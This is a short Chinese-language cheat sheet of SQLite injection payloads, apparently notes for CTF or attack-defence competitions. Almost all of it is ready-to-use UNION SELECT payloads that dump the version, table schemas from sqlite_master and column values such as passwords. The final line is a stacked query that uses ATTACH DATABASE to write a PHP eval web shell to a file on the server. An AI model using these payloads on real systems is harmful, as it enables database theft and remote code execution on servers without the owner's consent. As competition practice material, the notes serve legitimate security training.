SQLITE 注入

sqlite中没有数据库的概念,一个文件就是一个数据库.同时sqlite中严格控制单双引号,要求双引号是表名和列名,单引号是字段的具体值.

union select 1,sqlite_version();
//查询版本

union select 1,sql from sqlite_master where type='table';
//查询表名

union select 1,sql from sqlite_master where type='table' and name='ctf';
//指定表名查询字段(实际没什么用)

union select id,name,pwd from "awdp";
//查询指定列的值

union select id,name,group_concat(pwd) from "awdp";
//可以使用group_concat去进行拼接

;ATTACH DATABASE 'D:\shell.php' AS shell;create TABLE shell.exp (payload text); insert INTO shell.exp (payload) VALUES ('<?php @eval($_POST["x"]); ?>'); --